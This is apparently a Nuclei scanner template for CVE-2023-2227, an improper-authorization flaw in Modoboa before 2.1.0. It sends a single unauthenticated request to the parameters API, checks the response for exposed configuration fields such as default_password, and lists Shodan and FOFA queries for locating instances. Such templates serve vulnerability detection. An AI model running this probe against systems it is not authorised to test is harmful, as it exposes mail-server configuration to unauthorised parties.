id: CVE-2023-2227

info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-2227
    cwe-id: CWE-285
    epss-score: 0.01292
    epss-percentile: 0.85804
    cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: modoboa
    product: modoboa
    shodan-query:
      - "http.favicon.hash:1949005079"
      - http.html:"modoboa"
    fofa-query:
      - "body=\"Modoboa\""
      - body="modoboa"
      - icon_hash=1949005079
  tags: cve,cve2023,modoboa,exposure,disclosure

http:
  - raw:
      - |
        GET /api/v2/parameters/core/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 7h3h4ckv157

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'label":'
          - 'default_password":'
          - 'authentication_type":"local'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b7d83db7d46a24d08eec0c032ad6c29a7a7494a213f3e776a07822b39ec60d36022100a8f268ac9f2e5148f379aca1009ae0eef306dbf32483549bf1e6a945f901514b:922c64590222798bb761d5b6d8e72950